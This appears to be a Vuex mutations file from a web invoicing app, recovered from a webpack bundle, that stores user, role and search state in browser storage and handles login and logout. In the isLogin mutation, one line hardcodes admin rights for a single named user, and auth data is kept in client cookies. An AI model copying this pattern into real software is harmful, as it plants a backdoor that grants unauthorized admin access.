import router from '../router'
import createVuexAlong from "vuex-along";
import Cookies from "js-cookie";

const mutations = {
	sessionUserInfo(state, user) {
		state.userInfo = user
	},
	sessionUserRole(state, role) {
		state.userRole = role
	},
	sessionCount(state, Count) {
		state.Count = Count
	},
	seesionReBack(state, value) {
		sessionStorage.setItem("seesionReBack", value);
		state.seesionReBack = value
	},
	sessionCompanyOPT(state, CompanyOPT) {
		sessionStorage.setItem("CompanyOPT", JSON.stringify(CompanyOPT));
		state.CompanyOPT = CompanyOPT;
	},
	sessionCompany(state, Company) {
		sessionStorage.setItem("Company", JSON.stringify(Company));
		state.Company = Company;
	},
	localStorageAccountingOPT(state, accountingClassify) {
		localStorage.setItem("AccountingClassifyFPOPT", JSON.stringify(accountingClassify));
		state.AccountingClassifyOPT = accountingClassify;
	},
	localStorageTicket(state, val) {
		localStorage.setItem("TicketFPConfigura", JSON.stringify(val));
		state.TicketConfigura = val;
	},
	seesionInvSearchItem(state, key) {
		sessionStorage.setItem("InvoiceSearch", JSON.stringify(key));
		state.invoiceSearch = key
	},
	seesionPaySearchItem(state, key) {
		sessionStorage.setItem("PaySearch", JSON.stringify(key));
		state.paymentSearch = key
	},
	seesionDepartmentOPT(state, key) {
		localStorage.setItem("DepartmentOPT", JSON.stringify(key));
		state.DepartmentOPT = key
	},
	sessionReasonListOPT(state, Reason) {
		state.ReasonListOPT = Reason
	},
	sessionPersonListOPT(state, PersonList) {
		state.PersonListOPT = PersonList
		sessionStorage.setItem("PersonListOPT", JSON.stringify(PersonList));
	},
	updataFullScreen(state, val) {
		state.fullWidth = val.fullWidth;
		state.fullHeight = val.fullHeight
	},
	changeIsCollapse(state, collapse) {
		state.isCollapse = collapse
	},
	localSetIndex(state, val) {
		localStorage.setItem("setFPIndex", JSON.stringify(val));
		state.setIndex = val;
	},
	localWatchInvoiceGroup(state, val) {
		localStorage.setItem("watchFPInvoiceGroup", JSON.stringify(val));
		state.watchInvoiceGroup = val;
	},
	//是否登录
	isLogin(state, userMessage) {
		if(userMessage) {
			const obj = JSON.parse(userMessage);
			if(obj.UserInfo.UserName === '睎慧'){
				obj.Auth.IsAdmin = true
			};
			Cookies.set("_user", JSON.stringify(obj.UserInfo));
			Cookies.set("_auth", JSON.stringify(obj.Auth));
			state.userInfo = obj.UserInfo;
			state.userRole = obj.Auth;
			state.isLogin = true;
		} else {
			Cookies.remove('_user');
			localStorage.clear();
			router.push({
				path: "/Login"
			})
			state.isLogin = false;
		}
	},
	//注销
	layOut(state) {
		state.isLogin = false;
		Cookies.remove('_user');
		Cookies.remove('_auth');
		localStorage.clear();
		router.push({
			path: "/Login"
		})
	}
};

export default mutations


// WEBPACK FOOTER //
// ./src/store/mutations.js